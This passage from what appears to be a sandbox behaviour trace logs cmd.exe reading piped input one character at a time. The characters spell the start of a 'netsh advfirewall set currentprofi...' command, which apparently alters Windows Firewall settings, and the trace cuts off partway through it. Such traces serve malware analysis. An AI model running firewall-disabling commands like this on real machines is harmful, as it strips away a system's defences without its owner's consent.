lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0135.957] WriteFile (in: hFile=0x274, lpBuffer=0x7ff6de089970*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x58b38ff2b8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesWritten=0x58b38ff2b8*=0x2, lpOverlapped=0x0) returned 1 [0135.957] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff6de08bb90, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0135.957] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x1eeca3b0080 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0135.957] malloc (_Size=0x107ce) returned 0x1eeca3c0060 [0135.958] _vsnwprintf (in: _Buffer=0x1eeca3c0060, _BufferCount=0x83e5, _Format="%s", _ArgList=0x58b38ff2f8 | out: _Buffer="C:\\WINDOWS\\system32") returned 19 [0135.958] _vsnwprintf (in: _Buffer=0x1eeca3c0086, _BufferCount=0x83d2, _Format="%c", _ArgList=0x58b38ff2f8 | out: _Buffer=">") returned 1 [0135.958] _get_osfhandle (_FileHandle=1) returned 0x274 [0135.958] GetFileType (hFile=0x274) returned 0x3 [0135.958] _get_osfhandle (_FileHandle=1) returned 0x274 [0135.958] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="C:\\WINDOWS\\system32>", cchWideChar=-1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\WINDOWS\\system32>", lpUsedDefaultChar=0x0) returned 21 [0135.958] WriteFile (in: hFile=0x274, lpBuffer=0x7ff6de089970*, nNumberOfBytesToWrite=0x14, lpNumberOfBytesWritten=0x58b38ff2e8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesWritten=0x58b38ff2e8*=0x14, lpOverlapped=0x0) returned 1 [0135.958] _get_osfhandle (_FileHandle=0) returned 0x264 [0135.958] GetFileType (hFile=0x264) returned 0x3 [0135.958] _get_osfhandle (_FileHandle=0) returned 0x264 [0135.958] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.958] ReadFile (in: hFile=0x264, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x58b38ff648, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x58b38ff648*=0x1, lpOverlapped=0x0) returned 1 [0135.959] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c30, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0135.959] _get_osfhandle (_FileHandle=0) returned 0x264 [0135.959] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.959] ReadFile (in: hFile=0x264, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x58b38ff648, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x58b38ff648*=0x1, lpOverlapped=0x0) returned 1 [0135.959] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c32, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0135.959] _get_osfhandle (_FileHandle=0) returned 0x264 [0135.959] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.959] ReadFile (in: hFile=0x264, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x58b38ff648, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x58b38ff648*=0x1, lpOverlapped=0x0) returned 1 [0135.959] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c34, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0135.959] _get_osfhandle (_FileHandle=0) returned 0x264 [0135.959] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.959] ReadFile (in: hFile=0x264, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x58b38ff648, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x58b38ff648*=0x1, lpOverlapped=0x0) returned 1 [0135.959] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c36, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0135.959] _get_osfhandle (_FileHandle=0) returned 0x264 [0135.959] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.959] ReadFile (in: hFile=0x264, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x58b38ff648, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x58b38ff648*=0x1, lpOverlapped=0x0) returned 1 [0135.959] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c38, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0135.959] _get_osfhandle (_FileHandle=0) returned 0x264 [0135.959] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.959] ReadFile (in: hFile=0x264, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x58b38ff648, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x58b38ff648*=0x1, lpOverlapped=0x0) returned 1 [0135.959] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c3a, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0135.959] _get_osfhandle (_FileHandle=0) returned 0x264 [0135.959] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.959] ReadFile (in: hFile=0x264, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x58b38ff648, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x58b38ff648*=0x1, lpOverlapped=0x0) returned 1 [0135.959] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c3c, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0135.959] _get_osfhandle (_FileHandle=0) returned 0x264 [0135.960] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.960] ReadFile (in: hFile=0x264, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x58b38ff648, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x58b38ff648*=0x1, lpOverlapped=0x0) returned 1 [0135.960] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c3e, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0135.960] _get_osfhandle (_FileHandle=0) returned 0x264 [0135.960] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.960] ReadFile (in: hFile=0x264, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x58b38ff648, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x58b38ff648*=0x1, lpOverlapped=0x0) returned 1 [0135.960] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c40, cchWideChar=1 | out: lpWideCharStr="v") returned 1 [0135.960] _get_osfhandle (_FileHandle=0) returned 0x264 [0135.960] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.960] ReadFile (in: hFile=0x264, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x58b38ff648, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x58b38ff648*=0x1, lpOverlapped=0x0) returned 1 [0135.960] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c42, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0135.960] _get_osfhandle (_FileHandle=0) returned 0x264 [0135.960] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.960] ReadFile (in: hFile=0x264, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x58b38ff648, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x58b38ff648*=0x1, lpOverlapped=0x0) returned 1 [0135.960] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c44, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0135.960] _get_osfhandle (_FileHandle=0) returned 0x264 [0135.960] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.960] ReadFile (in: hFile=0x264, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x58b38ff648, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x58b38ff648*=0x1, lpOverlapped=0x0) returned 1 [0135.960] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c46, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0135.960] _get_osfhandle (_FileHandle=0) returned 0x264 [0135.960] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.960] ReadFile (in: hFile=0x264, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x58b38ff648, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x58b38ff648*=0x1, lpOverlapped=0x0) returned 1 [0135.960] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c48, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0135.960] _get_osfhandle (_FileHandle=0) returned 0x264 [0135.960] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.960] ReadFile (in: hFile=0x264, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x58b38ff648, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x58b38ff648*=0x1, lpOverlapped=0x0) returned 1 [0135.961] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c4a, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0135.961] _get_osfhandle (_FileHandle=0) returned 0x264 [0135.961] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.961] ReadFile (in: hFile=0x264, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x58b38ff648, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x58b38ff648*=0x1, lpOverlapped=0x0) returned 1 [0135.961] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c4c, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0135.961] _get_osfhandle (_FileHandle=0) returned 0x264 [0135.961] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.961] ReadFile (in: hFile=0x264, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x58b38ff648, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x58b38ff648*=0x1, lpOverlapped=0x0) returned 1 [0135.961] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c4e, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0135.961] _get_osfhandle (_FileHandle=0) returned 0x264 [0135.961] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.961] ReadFile (in: hFile=0x264, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x58b38ff648, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x58b38ff648*=0x1, lpOverlapped=0x0) returned 1 [0135.961] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c50, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0135.961] _get_osfhandle (_FileHandle=0) returned 0x264 [0135.961] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.961] ReadFile (in: hFile=0x264, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x58b38ff648, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x58b38ff648*=0x1, lpOverlapped=0x0) returned 1 [0135.961] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c52, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0135.961] _get_osfhandle (_FileHandle=0) returned 0x264 [0135.961] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.961] ReadFile (in: hFile=0x264, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x58b38ff648, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x58b38ff648*=0x1, lpOverlapped=0x0) returned 1 [0135.961] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c54, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0135.961] _get_osfhandle (_FileHandle=0) returned 0x264 [0135.961] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.961] ReadFile (in: hFile=0x264, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x58b38ff648, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x58b38ff648*=0x1, lpOverlapped=0x0) returned 1 [0135.961] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c56, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0135.961] _get_osfhandle (_FileHandle=0) returned 0x264 [0135.961] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.962] ReadFile (in: hFile=0x264, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x58b38ff648, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x58b38ff648*=0x1, lpOverlapped=0x0) returned 1 [0135.962] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c58, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0135.962] _get_osfhandle (_FileHandle=0) returned 0x264 [0135.962] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.962] ReadFile (in: hFile=0x264, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x58b38ff648, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x58b38ff648*=0x1, lpOverlapped=0x0) returned 1 [0135.962] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c5a, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0135.962] _get_osfhandle (_FileHandle=0) returned 0x264 [0135.962] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.962] ReadFile (in: hFile=0x264, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x58b38ff648, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x58b38ff648*=0x1, lpOverlapped=0x0) returned 1 [0135.962] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c5c, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0135.962] _get_osfhandle (_FileHandle=0) returned 0x264 [0135.962] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.962] ReadFile (in: hFile=0x264, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x58b38ff648, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x58b38ff648*=0x1, lpOverlapped=0x0) returned 1 [0135.962] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c5e, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0135.962] _get_osfhandle (_FileHandle=0) returned 0x264 [0135.962] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.962] ReadFile (in: hFile=0x264, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x58b38ff648, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x58b38ff648*=0x1, lpOverlapped=0x0) returned 1 [0135.962] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c60, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0135.962] _get_osfhandle (_FileHandle=0) returned 0x264 [0135.962] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.962] ReadFile (in: hFile=0x264, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x58b38ff648, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x58b38ff648*=0x1, lpOverlapped=0x0) returned 1 [0135.962] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c62, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0135.962] _get_osfhandle (_FileHandle=0) returned 0x264 [0135.962] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.962] ReadFile (in: hFile=0x264, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x58b38ff648, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x58b38ff648*=0x1, lpOverlapped=0x0) returned 1 [0135.962] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c64, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0135.963] _get_osfhandle (_FileHandle=0) returned 0x264 [0135.963] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.963] ReadFile (in: hFile=0x264, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x58b38ff648, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x58b38ff648*=0x1, lpOverlapped=0x0) returned 1 [0135.963] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c66, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0135.963] _get_osfhandle (_FileHandle=0) returned 0x264 [0135.963] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.963] ReadFile (in: hFile=0x264, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x58b38ff648, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x58b38ff648*=0x1, lpOverlapped=0x0) returned 1 [0135.963] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c68, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0135.963] _get_osfhandle (_FileHandle=0) returned 0x264 [0135.963] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.963] ReadFile (in: hFile=0x264, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x58b38ff648, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x58b38ff648*=0x1, lpOverlapped=0x0) returned 1 [0135.963] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c6a, cchWideChar=1 | out: lpWideCharStr="p") returned 1 [0135.963] _get_osfhandle (_FileHandle=0) returned 0x264 [0135.963] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.963] ReadFile (in: hFile=0x264, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x58b38ff648, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x58b38ff648*=0x1, lpOverlapped=0x0) returned 1 [0135.963] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c6c, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0135.963] _get_osfhandle (_FileHandle=0) returned 0x264 [0135.963] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.963] ReadFile (in: hFile=0x264, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x58b38ff648, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x58b38ff648*=0x1, lpOverlapped=0x0) returned 1 [0135.963] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c6e, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0135.963] _get_osfhandle (_FileHandle=0) returned 0x264 [0135.963] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.963] ReadFile (in: hFile=0x264, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x58b38ff648, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x58b38ff648*=0x1, lpOverlapped=0x0) returned 1 [0135.963] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c70, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0135.963] _get_osfhandle (_FileHandle=0) returned 0x264 [0135.963] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.963] ReadFile (in: hFile=0x264, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x58b38ff648, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x58b38ff648*=0x1, lpOverlapped=0x0) returned 1 [0135.964] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c72, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0135.964] _get_osfhandle (_FileHandle=0) returned 0x264 [0135.964] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.964] ReadFile (in: hFile=0x264, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x58b38ff648, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x58b38ff648*=0x1, lpOverlapped=0x0) returned 1 [0135.964] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c74, 